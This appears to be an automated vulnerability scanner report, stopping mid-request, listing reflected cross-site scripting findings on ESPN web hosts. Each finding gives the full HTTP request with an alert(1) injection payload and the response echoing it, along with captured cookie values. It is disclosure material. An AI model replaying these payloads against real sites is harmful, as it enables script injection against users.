HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:17:41 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:17:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 14:26:01 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2620
The value of the omniPageName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c58"%3balert(1)//be026dd05fd was submitted in the omniPageName parameter. This input was echoed as a6c58";alert(1)//be026dd05fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickema6c58"%3balert(1)//be026dd05fd HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:21:08 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:21:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN22 Cache-Expires: Sat, 06 Nov 2010 14:29:28 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 2910
The value of the player request parameter is copied into a JavaScript rest-of-line comment. The payload 79c55</script><script>alert(1)</script>f04c1eba61f was submitted in the player parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame0979c55</script><script>alert(1)</script>f04c1eba61f&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 14:27:02 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3132
The value of the player request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e261'%3balert(1)//073d4ffc633 was submitted in the player parameter. This input was echoed as 6e261';alert(1)//073d4ffc633 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame096e261'%3balert(1)//073d4ffc633&height=2431a1a5'%3balert(1)//f13274ea7b9&width=432&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:18:34 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:18:34 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 14:26:54 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3022
The value of the width request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c16e'%3balert(1)//7133253776d was submitted in the width parameter. This input was echoed as 4c16e';alert(1)//7133253776d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videohub/mpf/frame/playerEmbed?id=5654897&player=iFrame09&height=2431a1a5'%3balert(1)//f13274ea7b9&width=4324c16e'%3balert(1)//7133253776d&omniPageName=fantasy:poker:pokerpickem HTTP/1.1 Host: espn.go.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RegTrackX=Rumor+Central+-+MLB%3A+Top+Rumor+Preston+Wilson|null|rumorCentral; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1289019281; s_pers=%20s_c24%3D1289019231555%7C1383627231555%3B%20s_c24_s%3DFirst%2520Visit%7C1289021031555%3B%20s_gpv_pn%3Despn%253Amlb%253Anews%253Astory%253Astoryid%253D5767238-101105%252Bnuns%252Bsell%252Bhonus%252Bwagner%252Bcard%252Bfor%252B262000%7C1289021031585%3B; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 14:19:56 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 14:19:56 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 14:28:16 GMT X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 3106
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b83e1<script>alert(1)</script>d5ce256c82c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:27 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/staticb83e1<script>alert(1)</script>d5ce256c82c/css/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c9679<script>alert(1)</script>3c99b6ca0a5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:32 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/cssc9679<script>alert(1)</script>3c99b6ca0a5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 91bdc<script>alert(1)</script>182530dbb64 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64 HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:35 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/css/main91bdc<script>alert(1)</script>182530dbb64</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a89ef<script>alert(1)</script>59ae141c417 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:34 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/statica89ef<script>alert(1)</script>59ae141c417/js/main</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5d1cb<script>alert(1)</script>4c687beadc5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:37 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js5d1cb<script>alert(1)</script>4c687beadc5/main</BODY></HTML>
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd44f<script>alert(1)</script>1c2bc0e9cef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef HTTP/1.1 Host: g.espncdn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found X-Cnection: Close Content-Length: 146 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Date: Sat, 06 Nov 2010 16:11:41 GMT Connection: close
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/mpcommons/static/js/maincd44f<script>alert(1)</script>1c2bc0e9cef</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7b155<script>alert(1)</script>4134dc3e7cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage7b155<script>alert(1)</script>4134dc3e7cb HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage7b155<script>alert(1)</script>4134dc3e7cb</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f36c<script>alert(1)</script>45bed4dd97c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage9f36c<script>alert(1)</script>45bed4dd97c/basketball</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b7707<script>alert(1)</script>fed908440a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /frontpage/basketballb7707<script>alert(1)</script>fed908440a5 HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 142 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/frontpage/basketballb7707<script>alert(1)</script>fed908440a5</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd1f8<script>alert(1)</script>3870a2a6f26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage HTTP/1.1 Host: games.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 